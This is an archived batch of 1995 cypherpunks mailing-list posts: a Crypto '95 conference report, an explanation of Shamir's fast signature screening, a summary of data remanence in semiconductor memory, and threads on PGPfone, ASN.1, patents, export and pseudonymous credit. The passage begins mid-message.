completely.  The consequence of this is that NFS factoring is
substantially faster than expected, which implies that factoring is
somewhat easier than we thought."

	Please note that that doesn't mean RSA has been broken, or
that they can factor products of large primes in their heads.  It
means that there are speedups possible, but not enough that anyone
should be worrying about a 1024 bit key.

	The best quote of the conference was doubtless Robert Morris,
Sr, reminding us of the first rule of cryptanalysis, "Don't forget to
look for plaintext."

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 2 Sep 95 13:20:42 PDT
To: cypherpunks@toad.com
Subject: Crypto '95 report
Message-ID: <199509022019.NAA21443@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This was the first year I attended a Crypto conference (although for the
last two years I have "crashed" the evening rump session, where less
formal 5-10 minute presentations are given).  A number of list members
were present and it was good to meet a lot of new people.

I was a bit disappointed that few of the technical sessions were in areas
that I am interested in or that seem to have bearing on CP issues.  I
have read many of the Crypto proceedings and this year the pickings
seemed to be unusually slim.

Richard Schroeppel gave a very clear presentation on an implementation
of elliptic curve cryptography for a diffie-hellman-like key exchange.
This is a two-dimensional variation from the regular integers that are
used in most of the number theory based crypto, and has some
advantages.  This new implementation is actually faster than regular DH
for apparently the same security level.  It looks like elliptic curve
crypto is on the threshold of coming into widespread use.  I believe the
patent situation is one of the main reasons.

There were several papers on secret sharing, something we have discussed
here as an alternative to escrow for handling lost keys.  Amir Herzberg
et al had a method for "resharing" a shared secret periodically and
securely, so that if an adversary was stealthily sneaking in and learning
shares occasionally, he would be put back to square one when the secret
resharing phase occured.  Only the trustees are involved, not the
original secret holder, and the secret does not have to be reconstructed
during the resharing.

Bruce Dodson presented some results on using the Number Field Sieve
factoring algorithm.  Their implementation looks to be the fastest
available now, considerably better than the Quadratic Sieve that was used
for RSA-129.  I belive they estimated 1000 MIPS years would have been
enough for NFS to do RSA-129 compared to the 6000 MIPS years for QS.
They are now going to try another challenge number, RSA-130.  (RSA has
challenge numbers every 10 digits in size (or maybe it was 5): RSA-140,
RSA-150, etc.)

There was one paper on electronic cash, by Okamoto.  His technology is
distinguished by allowing divisibility - you can take a $10 and divide
it into 2 $5's without going back to the bank.  However he has always
had a problem that your various pieces of cash are linkable, although
not traceable to the user who withdrew them.  His new method uses
smaller amounts of data.  I was encouraged to see some progress on the
linkability issue: for the first time (that I have seen) he admits it
as a problem; he now has it so that theoretically the linkability is
only within a single divided piece of cash (so that if you didn't
divide you wouldn't have linkability).  Actually the overheads are too
large for this to by quite true, but it is a step in the right
direction.  He also included elimination of linkability as a future
goal.  Unfortunately his oral presentation was extremely shallow,
mostly describing what electronic cash was.

There was also a paper on "fingerprinting", the encoding of hidden
information into a document so that if the doc is leaked it can be traced
to the leaker.  The talk wasn't very clear but I was able to glean enough
that I now believe that this is possible whereas I didn't before.

I was discouraged to see a whole session on key escrow.  One presenter
described key escrow as a whole new area of cryptography, analogous to
the discovery of public key crypto when all that was known previously was
conventional key.  Now there are three areas.  The academic crypto
community seems to be greeting key escrow enthusiastically as a new
technical challenge.

The rump session had some good stuff, I thought.  Matt Blaze et al had a
paper on "Master Key" cryptosystems, a variation on escrow where the
government can read all the messages using a certain cryptosystem.  They
pointed out the similarity to the trap door concept used in public key
cryptography and concluded that an efficient master key system would be
an efficient public key system.  If you believe that the latter can't
exist then it follows that the master key versions can't exist either.

Bruce Schneier gave a talk summarizing the sketchy information known
about Skipjack (the cipher in Clipper), including some FOIA'd docs.
These included some comments from design reviews by Mycotronix on
earlier versions, which included references to F and G boxes or
tables.  This is the first I had heard of this and helps explain why
people thought S-1 was Skipjack or a hoax, since it had F and G
tables.  (I hadn't felt that the number of rounds and key/block sizes
were sufficient coincidence to preclude independent invention.)

A new crypto library was announced from AT&T.  It is written in C and
has a bignum lib (arbitrary size) and the usual crypto suspects,
although I think not RSA presuambly due to patent issues.  On a
reasonably modern PC it could do an RSA 1024 bit signature in 900
milliseconds.  Email to lacy@research.att.com with subject CRYPTOLIB to
be informed on when it will be released and how to get it.

Dhem and Quisquiter described CASCADE, a smart card system with voice
recognition for ID rather than the PIN usually used.
http://www.dice.ucl.ac.be/~dhem/cascade/.  This talk was hard to
understand due to the language differences.

Eric Hughes, co-founder of the cypherpunks, announced the formation of
Cypherpunk Laboratories, a California non-profit corporation.  It is
intended to be a common resource for people motivated by freely available
strong cryptography tools.  Among other things it will offer scholarships
and prizes to students who create relevant work and papers, consider
establishing an online journal focusing on implementations of crypto, and
work on software development.  One project Eric mentioned was to create a
replacement for PGP.

Ron Rivest proposed probabilisitic key escrow, which he described as
"translucent" crypto.  The idea is that with every message you send
there is a Law Enforcement Access Field, but there is only some
probability p that it is readable, and you can't tell if it will be
readable or not.  This way you don't lose as much privacy but criminals
can't take the risk that maybe they'll be unlucky and this particular
message will be readable.

Shamir had an interesting paper on preventing "flooding" attacks.  A
server may check for signatures on incoming messages to reject bogus ones
(only certain sigs are valid) but just doing a signature check may take
too long if it is really being flooded.  Shamir came up with a kind of
signature which can be quickly probabilistically checked, based on a
variation on the Rabin cryptosystem.  You can do almost all the work
using single precision and it should be very fast.  I will write this up
if anyone is interested.

Our own Wei Dai, at 19 the youngest author, has spent his summer
vacation developing with Josh Benaloh at Microsoft an improved modular
reduction algorithm, which unfortunately will be patented (or at least
they will try).  BTW a number of people from Microsoft were in attendance
at Crypto, including other list members.  Obviously this crypto stuff
is considered very important at MS.

One of the more interesting talks I thought was from cypherpunk Doug
Barnes, on "identity agnostic" electronic cash.  This is basically an
idea for creating a Magic-Money-type electronic cash server without
violating Chaum's cash patent.  What you do is to run the server and
publish a spec it will follow.  All the server does is do an RSA
signature on the raw data it receives and decrement the user's account
accordingly.  The user has a choice of doing blinding or not on the
signature.

Chaum's patent covers the blinding, so if the user wants to do that he
should be sure to license the patent or live somewhere it doesn't apply
(or ignore it if he figures he's too small potatoes for them to care
about).  But the server isn't responsible for checking all this.  It just
does RSA sigs, which is prior art as far as Chaum's patent goes.  Users
can blind or not, it doesn't care.  It is "identity agnostic" as Doug
says.

The implication is that with an RSA license you could run this kind of
bank (online cash) and ignore Chaum's patents, while a horde of end users
violate the patents but take safety in numbers and get anonymity.
Lawyers like to go after big targets but the servers aren't violating
anything.

The other things I enjoyed in the conference were the non technical talks
by Bob Morris (senior), retired NSA, and later Adi Shamir.  Morris said,
with what I thought was peculiar emphasis, "never underestimate the
amount of time, money, and effort your opponent will put into breaking
your encryption."  He was supposedly speaking in the context of the
German (and Allied) mistakes during WWII, but I got the impression he was
talking about today, and in fact warning of NSA efforts to spy on people.
He went on to describe the many ways mikes and antennas can be planted or
used - he looks at a telephone and sees a microphone, and the hand cord
is an antenna.  All in all a rather chilling talk from someone who
obviously can't say as much as he would like to.

Shamir had some interesting anecdotes about the invention of RSA.  He
emphasized what amateurs the three of them were, claiming this was
probably an advantage.

Some of the other talks I enjoyed without following all the details were
the cryptanalysis ones.  A lot of systems were broken or weaknesses
found.  Most were not ones I was familiar with but it just emphasizes how
hard it is to really come up with something strong.  All those bozos on
sci.crypt with their "break this" challenges would benefit from seeing
some of these results.

All in all there were several interesting results even if the percentage
seemed smaller than usual.

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Sun, 3 Sep 95 23:11:39 PDT
To: cypherpunks@toad.com
Subject: RE: Cyphernomicon, and a section on Escrow and Reputations
Message-ID: <50697.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> I know of a couple of alternative places. 

I too got tired of Netcom's anon ftp server.
An unaltered, ASCII copy of Tim's CP-FAQ is available as
http://www.isse.gmu.edu/~pfarrell/crypto/CP-FAQ
This is a low usage site, so response should be fine.

BTW, there is a page for the DC-area Cypherpunks as
http://www.isse.gmu.edu/~pfarrell/dccp/index.html

And a guide to every US GovernmentWWW page that I could find
(including locations of spook facilities) starting at
http://www.isse.gmu.edu/~pfarrell/government/usgov.html

Other crypto related resources are available starting at
http://www.isse.gmu.edu/~pfarrell/crypto.html


Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@obscura.com>
Date: Sat, 2 Sep 95 14:38:32 PDT
To: cypherpunks@toad.com
Subject: Nautilus 1.0 under OS/2 Warp?
Message-ID: <199509022131.OAA04066@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone run the Nautilus 1.0 secure telecom software in a DOS box
under OS/2?  When I've tried it, it starts up, audio saying "welcome
to Nautilus" comes out of my speakers, and I'm prompted for a
passphrase.  The problem comes when it tries to connect to the
modem. 

It comes back and says "Remote failed to connect" followed by
"Resetting modem...".  Then the software exits.  It never even takes
the phone line off the hook.  Other DOS comm software works just
fine in a DOS box, so why not Nautilus?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Sat, 2 Sep 95 14:07:04 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509021658.MAA29224@frankenstein.piermont.com>
Message-ID: <Pine.PMDF.3.91.950902170303.541094542B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Sep 1995, Perry E. Metzger cleverly sought to get legal 
advice from me by writing:: > 

> Michael, you are one of our local lawyers. Could you please confirm
> the length of the statute of limitations?
> 
harumphf.  (1) I'm not "local" -- as I plan to argue in my cameo at the 
next Sun User's Group confernece "cyberspace is not a jurisdiction" 
[apologies if you meant local == USA];  (2) as it happens, I'm nowhere 
near my law books at the moment, being telnetted from abut 1800 miles 
(I'd guess) away....so I'm unable to oblige right now.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 2 Sep 95 17:17:59 PDT
To: mark@unicorn.com
Subject: Re: PGPfone over Appletalk
Message-ID: <199509030016.RAA03752@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Rev. Mark Grant" <mark@unicorn.com>
> Can someone tell me how to run PGPfone over Appletalk ? The
> documentation says that support has been added for this release, and
> there's a preferences box to check to use it, but there's no information
> I can find in the documentation on how to initiate a call over
> Appletalk.. it just says to enter a telephone number to dial. If I 
> press 'Connect' without entering anything it hangs up the Mac.
> 
> How do I tell it which machine I want to connect to ? 

I changed the preferences box setting, but then I exited and restarted
the program so that it came up in "appletalk" mode.  This is probably
the step you are missing.  I did this on two different machines, and
then when I clicked connect it no longer tried to open the modem,
instead it put up a dialog box allowing me to click on the machine
running the other PGPfone.  I did that and it connected OK.  There is a
nice audio simulation of an old-fashioned telephone bell ringing.

Unfortunately my appletalk "network" consists solely of my power mac
and an old 68030 mac laptop, the latter apparently being underpowered for
PGPfone.  The voice quality changed occasionally as the software
adaptively tried different coders, and the powermac instance of the
program finally printed a message saying that the list of coders had
been exhausted.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jis@mit.edu)
Date: Wed, 20 Sep 95 17:16:36 PDT
To: cypherpunks@toad.com
Subject: ASN.1 AND KERBEROS VERSION 5
Message-ID: <9509201547165561@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sat, 2 Sep 1995 13:55:38 -0400
To: cypherpunks@toad.com
From: jis@mit.edu (Jeffrey I. Schiller)
Subject: ASN.1 and Kerberos version 5

-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
>I've heard people associated with the decision to use ASN.1 in
>Kerberos V say it was a mistake. Frankly, I think ASN.1 is a blight
>which should be exterminated from the planet.

I'll say it. I was the person who pushed for the use of ASN.1 in Kerberos
version 5. I had this disease at the time that made me think that ASN.1 was
a good idea. I got better, unfortunately we have been living with the
results of my braino for quite some time now... poor Ted.

However, the problem with ASN.1 isn't its waste of space (which actually
isn't that bad for a mechanism for encoding arbitrary objects). The problem
is that it is the product of a standards making process that didn't (and
doesn't) value interoperability. Adherence to the ISO specifications does
not guarantee interoperation. Instead regional "workshops" negotiate
aspects of implementations to obtain interoperation.

What does this mean for ASN.1? It means that the definition of ASN.1 is a
bit abstract (as its name implies). Problems result when two organizations
(say MIT and OSF!) attempt to implement from the specification in ASN.1 but
use different ASN.1 compilers and things then don't work. Arguments then
ensue about whose compiler (or manually written parsing code) is "correct"
in terms of doing the right thing with ASN.1. This is particularly so when
using DER (for Distinquished Encoding Rules) which is itself an
after-thought added to ASN.1 later in the process. It is required in order
to verify digital signatures (which have to be computed on the "encoded"
form of an object because there is no good way to calculate a signature on
an "abstract" object).

If the Kerberos specification said: "pub this byte here and that one there"
none of these arguments and problems would happen.

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEiaf8UtR20Nv5BtAQFzNAP/Q/LuIMbxAPAp64Kn2PSPd600TYlRAUJh
QbsuL/iRhGXWrxSjsFzkcr6e3sIpSFggxglFU38TJT/DG2AD8MOid3Uj4pRJVbyo
z7Au0Vp1NiotmRBHq2udItzJ7LLPM0j38FHQenqPs9mkX2Cq5kVgGUBO94HabEuE
S9XPCgV8E1Q=
=kTyw
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <adept@minerva.cis.yale.edu>
Date: Sat, 2 Sep 95 18:32:55 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Basic Public key algorithms.
In-Reply-To: <199509021813.OAA29335@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950902200055.7559K-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Sep 1995, Perry E. Metzger wrote:

> 
> Daniel R. Oelke writes:
> > I could use RSA (which is well described in many sources, and has
> > RSAREF out there),  but I want to avoid the patent issue if possible.  
> > The sci.crypt FAQ mentions that there are other methods but that 
> > is about all it says.  Are there any that are not patented?
> 
> No, because one patent covers public key cryptography itself, and not
> a particular method.

Point of information--I'm not flaming you Perry, but Public Key Partners 
claims that their patent covers all forms of Public Key Crypto.

Phoeeey.

Ben.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMEjwWb5ALmeTVXAJAQGW2wL/RAfqyRrNoUeYDBkQKSsDhasM/xGSF3R/
JHvJyaFHr04Z+8KydRXxt+fU54JH01webbiol1EmH9ZvOdc175VRVBSg5+EiykzM
1bdW6dZXejeHHVelI343mOv0+Y0fDeiT
=FPqc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 2 Sep 95 18:14:53 PDT
To: cypherpunks@toad.com
Subject: Quickly checking signatures
Message-ID: <199509030113.SAA19877@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Let me describe Shamir's method for quickly doing a probabilistic signature
check.  Since this was a rump session paper he didn't have it written up.

Shamir uses a variation of the Rabin system.  The Rabin encryption
system is similar to RSA, but instead of exponents which are relatively
prime to the predecessors of the factors of the modulus, the exponent
used is 2.  This requires somewhat different techniques.

A message M is encrypted by doing M^2 mod n.  The decryption is then
done by taking the modular square root.  There are a few technical
hitches that occur here but nothing major.  Similarly a message M is
signed by calculating its modular square root S such that S^2 = M mod n.
Note that with Rabin you can't just sign any arbitrary number as that
may allow the factors to be revealed.  However this is not a major problem
because practical systems in use today sign specially padded hashes,
not arbitrary numbers.

Now Shamir uses a slight modification to this.  Normally we have:

	S^2 = M mod n

This can be written as:

	S^2 = M + C*n

for some C, which is simply the definition of modular equality.  Now,
what he suggests is that instead of sending S as the signature of M, you
send C.  This is justified on 3 grounds:

	- C is the same size as S
	- C has the same security as S (knowing M and n you can derive C
	  from S and vice versa)
	_ C and S are equally easy to generate

However, by sending C as the signature of a message M it allows a fast
screening to be done.  The idea is that the message should be accepted if
M+C*n is a perfect square (because then S can be derived as the normal
square root - that is how you get S from C as mentioned above).  And this
is something that can be checked quickly.

In number theory there is a notion of a "quadratic residue" modulo some
number.  If a number is a quadratic residue that simply means that it has
a square root, that it is the square of some other number using the
modulus.  With a prime modulus half of the numbers are quadratic residues
and half are not.  For example, with modulus 7 the q.r.'s are 1, 2 and 4
and the non q.r.'s are 3, 5, and 6.  It turns out that testing whether a
number x is a quadratic residue modulo a prime p can be done by
calculating x^((p-1)/2) mod p.  This will be 1 if and only if x is a q.r.

Now, the key idea is this: if a number is a perfect square then the
result of taking that number modulo a prime must be a quadratic residue.
This means that we can quickly determine that C is a perfect square by
checking whether C mod p for various random small primes p is a quadratic
residue.

By picking p to be a single precision prime of say 16 bits, the q.r.
calculation can all be done without using multiple precision arithmetic
and so it will be very fast compared to actually checking a signature.

So, the procedure for the check is as follows: given n, M and C, choose a
small prime p and calculate M+C*n mod p.  Then raise this to the (p-1)/2
power mod p and see if the answer is 1.  If it is, we give a
"provisional" acceptance to the signature.  If it is not, we reject the
signature; it cannot be valid.  This test may be repeated a few times
with different values of p to improve the rejection of bad signatures.
Once we have taken the input numbers mod p the rest of the arithmetic can
be done with ordinary single precision integer variables.

(One thing I overlooked is the possibility that M+C*n will be a multiple
of p.  In that case M+C*n mod p will be 0 and this is a provisional pass.)

Of course checking the signature the old-fashioned way just takes a
single multi precision multiplication, which won't be all that slow.
So this puts a limit on the number of p's you can check this fast
way before it becomes slower.  Also, you'd have to choose the primes at
random as otherwise an attacker who knew your p's could conjure up a C
which would produce a quadratic residue for some small number of known
p's.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut01@cs.auckland.ac.nz (Peter Gutmann)
Date: 2 Sep 1995 18:26:03 GMT
Subject: SUMMARY: Not-so-volatile volatile memory
Message-ID: <42a7jr$1me@net.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain





About a month ago, I asked for comments about recovering data from
semiconductor memory after power had been removed.  After much procrastinating,
I've finally finished the summary of what people sent me.  Many thanks to
everyone who responded, in particular to Bob Hale for answering many questions
about the possibility of recovering data from DRAM's.
 
If anyone has any further comments to add to this (I'm particularly interested
in actual figures for data retention in DRAM cells, although I've been told
this is burn-before-reading proprietary information), you can send it to me at
the above address.
 
Peter.

-- Summary: Data retention in semiconductor memory --
 
Contrary to conventional wisdom, "volatile" semiconductor memory does not
entirely lose its contents when power is removed.  Both static (SRAM) and
dynamic (DRAM) memory retain some information on the data stored in it while
power was still applied.  SRAM is particularly susceptible to this problem, as
storing the same data in it over a long period of time has the effect of
altering the preferred power-up state to the state which was stored when power
was removed.  Older SRAM chips could often "remember" the previously held state
for several days.  In fact, it is possible to manufacture SRAM's which always
have a certain state on power-up, but which can be overwritten later on - a
kind of "writeable ROM".
 
DRAM can also "remember" the last stored state, but in a slightly different
way.  It isn't so much that the charge (in the sense of a voltage appearing
across a capacitance) is retained by the RAM cells, but that the thin oxide
which forms the storage capacitor dielectric is highly stressed by the applied
field, or is not stressed by the field, so that the properties of the oxide
change slightly depending on the state of the data.  One thing that can cause a
threshold shift in the RAM cells is ionic contamination of the cell(s) of
interest, although such contamination is rarer now than it used to be, because
robotic handling of the materials and the purity of chemicals is greatly
improved.  However, even a perfect oxide is subject to having its properties
changed by an applied field.  When it comes to contaminants, sodium is the most
common offender - it is found virtually everywhere, and is a fairly small (and
therefore mobile) atom with a positive charge.  In the presence of an electric
field, it migrates towards the negative pole with a velocity which depends on
temperature, concentration of the sodium, the oxide quality, and the other
impurities in the oxide such as dopants from the processing.  If the electric
field is zero and, given enough time, the sodium contamination tends to spread
itself around evenly.
 
Other factors which affect the rate of change are temperature, the field
strength of the stored charge, the quality of the oxide, and the concentration
of dopants and other impurities which have already been mentioned above.  The
stress on the cell a cumulative effect, much like charging an RC circuit.  If
the data is applied for only a few milliseconds then there is very little
"learning" of the cell, but if it is applied for hours then the cell will
acquire a strong (relatively speaking) change in its threshold.
 
The effects of the stress on the RAM cells can be measured using the built-in
self test capabilities of the cells, which provide the the ability to impress a
weak voltage on the storage cell in order to measure its margin.  Cells will
show different margins depending on how much oxide stress has been present.
Many DRAM's have undocumented test modes which allow some normal I/O pin to
become the power supply for the RAM core when the special mode is active.
 
One way to activate the special test mode might be to underdrive a pin and turn
on its protection diodes(s), which will be recognized internally and will
change a multiplexer so that the core is powered by some pin which is normally
a digital I/O pin.  Another way, if the DRAM has suitable clocks, is to
recognise an invalid combination of clocks (such as CAS before RAS, if the DRAM
doesn't use that mode for higher speed operation) to enable the test mode.
Great care must be taken to ensure that the test mode isn't inadvertently
entered so that the memory system appears to be malfunctioning (for example in
the first case if the system has substantial undershoot at the wrong time, the
test mode could be activated).  This problem can be avoided by designing the
test mode signals such that a certain set of states which would not occur in a
normally-functioning system has to be traversed to activate the mode.
Manufacturers won't admit to such capabilities in their products because they
don't want their customers using them and potentially rejecting devices which
comply with their spec sheets, but have little margin beyond that.
 
One way to speed up the annihilation of stored bits in semiconductor memory is
to heat it.  Both DRAM's and SRAM's will lose their contents a lot more quickly
at Tjunction = 140C than they will at room temperature.  Several hours at that
temperature with no power applied will clear their contents sufficiently to
make recovery difficult.  Conversely, to extend the life of stored bits with
the power removed, drop the temperature below -60C (some people even claim that
you can permanently "imprint" an SRAM with its stored bits by rapidly cooling
it below liquid nitrogen's boiling point).  In any case it should lead to
weeks, instead of hours or days, of data "retention".
 
Simply repeatedly overwriting the data held in DRAM with new data isn't nearly
as effective as it is for magnetic media.  The new data will begin stressing or
relaxing the oxide as soon as it is written, and the oxide will immediately
begin to take a "set" which will either reinforce the previous "set" or will
weaken it.  The greater the amount of time that new data has existed in the
cell, the more the old stress is "diluted", and the less reliable the
information extraction will be.  Generally, the rates of change due to stress
and relaxation are in the same order of magnitude.  Thus, a few microseconds of
storing the opposite data to the currently stored value will have little effect
on the oxide.  Ideally, the oxide should be exposed to as much stress at the
highest feasible temperature and for as long as possible to get the greatest
"erasure" of the data.  Unfortunately if carried too far this has a rather
detrimental effect on the life expectancy of the RAM.
 
Therefore the goal to aim for when sanitising memory is to store the data for
as long as possible rather than trying to change it as often as possible.
Conversely, storing the data for as short a time as possible will reduce the
chances of it being "remembered" by the cell.  Based on tests on DRAM cells, a
storage time of one second causes such a small change in threshold that it
probably isn't detectable.  On the other hand, one minute probably is
detectable, and 10 minutes is certainly detectable.
 
The most practical solution to the problem of DRAM data retention is therefore
to constantly flip the bits in memory to ensure that a memory cell never holds
a charge long enough for it to be "remembered".  While not practical for
general use, it is possible to do this for small amounts of data such as
encryption keys.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Sep 95 02:23:04 PDT
To: Ben <adept@minerva.cis.yale.edu>
Subject: Re: Basic Public key algorithms.
In-Reply-To: <Pine.SOL.3.91.950902200055.7559K-100000@minerva>
Message-ID: <199509030031.UAA29612@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ben writes:
> > Daniel R. Oelke writes:
> > > I could use RSA (which is well described in many sources, and has
> > > RSAREF out there),  but I want to avoid the patent issue if possible.  
> > > The sci.crypt FAQ mentions that there are other methods but that 
> > > is about all it says.  Are there any that are not patented?
> > 
> > No, because one patent covers public key cryptography itself, and not
> > a particular method.
> 
> Point of information--I'm not flaming you Perry, but Public Key Partners 
> claims that their patent covers all forms of Public Key Crypto.

How is this at all different from what I just said?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Sat, 2 Sep 95 15:51:31 PDT
To: cypherpunks@toad.com
Subject: Re: MIT distributing PGPfone -Reply
Message-ID: <199509022301.SAA00324@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>PGPfone was out of the U.S. less than 3 hours after first appearing
>publically at the MIT site.
>
>As I noted in a previous message, MIT takes various steps to ostensibly
>protect against export, but there is clearly no practical means of stopping
>export once the software has been received by someone.
>
>I got my copy of PGPfone 16 hours after its public release, via an
>anonymous person who posted it on the Cypherpunks list through an anonymous
>remailer. Of course that list is distributed to more than 20 foreign
>countries, so "export" happened that way, as well as by other means.
>
>--Tim May
>

As tim May's .sig should say: "National borders are not even
speed bumps on the information highway."

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Murray <davidm@iconz.co.nz>
Date: Fri, 1 Sep 95 23:40:55 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: A problem with anonymity
Message-ID: <199509020640.SAA23731@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:15 PM 9/1/95 -0700, you wrote:
>At 10:45 AM 9/2/95, David Murray wrote:
>>[Akerlof, if I remember my economics right (and I am confident that I will
>>be corrected if I don't) analysed a market for used cars.
...
>>... So the only cars for sale would be lemons :-)]
>
>I haven't encountered this example, but it clearly misses some important
>real-world issues.
...
>Like a lot of simple game-theoretic models, the application to the real
>world is quite different.

True. But it does make the point that, in a perhaps surprising way, the
bad can drive out the good. [I certainly don't want to get into any kind
of normative v. postive methodological debate.] The lesson is not that
"You can never find a decent used car", but that, in a market with particular
characterisics (particularly with regard to what information is available
to whom), lemons drive out the good. This just means that owners of good
used cars offer them for sale in a market where pre-purchase checks are
possible, etc..

But this is to concentrate on the example, not on the substance...

>But I certainly agree that crypto will reignite interest in analyses of
>such game theory questions. Another way of viewing anonymity vs.
>non-anonymity is that knowing the True Name of a party with whom one trades
>is just _one element_ of a transaction. By no means is it essential.

I guess I was using True Name somewhat unusually. I didn't mean "True Name=
state approved unique identifier of a human being" so much as "True Name<>
easily discardable/transferrable/sellable digital pseudonym". 

I certainly did not mean to imply that net.commerce is impossible, or that
it would only take place on the basis of True Names, however defined. Rather
I was commenting that one pervasive feature of non-net.commerce is the
ability to track down someone that owes you something and sue them/beat it
out of them. You can't do this to a digital pseudonym. As you rightly
pointed out, you can't do this to someone who escapes to South America,
or to the guy who runs the market stall that won't be there tomorrow. So 
you take a bond, or you take your chances. I still think that, because of
the (perfect) ease with which net.rep's are transferrable/cash-in-able,
the chances you take in the digital domain are so much higher as to be
(almost?) qualatatively different.

>>If you can't rely on the unsecured promise of a digital pseudonym, and you
>>can't accept reputation as 'security', how do you extend credit?
>
>I am willing to extend some amound of credit to PrOduct Cypher, Black
>Unicorn, etc., based on their past reputation and on the fact that I can
>show to others the transactions into which their pseudonyms entered and
>thus expose them if they default. Now _how much_ I'm willing to extend is
>of course a more complicated issue, but the principal is still there: a
>purely digital pseudonym, with no possibility of being tied to a True Name,
>can still be extended credit....I just said I would do so.

This would, of course, allow PrOduct Cypher (for example) to cash in on hir
rep. [Hir - never thought I'd see myself use it: ughhhhhhh <shiver>]. But,
unlike the unscrupulous stall owner, who would have to sell the gold watch
before he decamped, PC could sell hir rep before the rip-off had been done.
This would be a sort of division of labour - rep-builders and rep-exploiters.
In cybersapce, you could never tell whether you were dealing with the rep
builder (buying a good car) or a rep exploiter (buying a lemon).

Yes the rep-exploitation would be a one-shot thing. Within seconds of the
sting PC's name would be mud. [And, yes, you could probably tell whether
it was one of those two you were dealing with - if it asked for credit, it
wouldn't be 'corn or 'pher :-)]

But it is the _possibility_ of the scam that would shape the market.

By the way, my final question was not rhetorical. I _do_ think methods of
extending credit to pseudonyms will be developed. I just think they will
be based on (possibly new) types of security interest. An old type of 
security interest (perhaps the oldest) could be used right away - the pledge.
If Bob Pseudonymous pledges $100 worth of digital certificates, I would be
glad to lend him $100 (well, perhaps $80 - gotta secure the interest:-)

Cryptography might develop other ways of protecting the interests of
creditors, while preserving the anonymity of debtors. In fact, I'm certain
it will. And I'm just as sure the law/mercantile practice will assist in
the process.

And like you, I believe it is not only possible, but preferable, that this
is done without the interevention/'assistance' of the state.

Cheers,

Dm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEftjllo3j8JHzalAQE1OwP+IQTX2hUfJXI8Q7ojgFcKbnvxRLngSyDp
rLm0wjZvMoiLwCqwhqn6F3ypTJBD0pS1ZT7ql+rnnEsYtQ75Xu0iJFbnnIY4whNh
gB1plcImYms88Rt7VEuCjHZeAMHcV3tPZL9DHQVHZXMwqWKCeyBaImVaEosJTwZj
IuZ4HHCi+GE=
=V7vf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sat, 2 Sep 95 15:45:05 PDT
To: cypherpunks@toad.com
Subject: VoicePGP Query
Message-ID: <199509022244.SAA24545@csws5.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



Due to some acct. problems I lost most of the mail snet to me betw. May
and September.  I saw a post in a newsgroup about VoicePGP betas being 
available, though only for Mac and WIn'95... is this true? And if so,
will there be a Win 3.11 or OS/2 or DOS version out eventually? I don't
intend to get Win '95 for as long as I can avoid it (and this is NOT the
start of an OS flame war...)

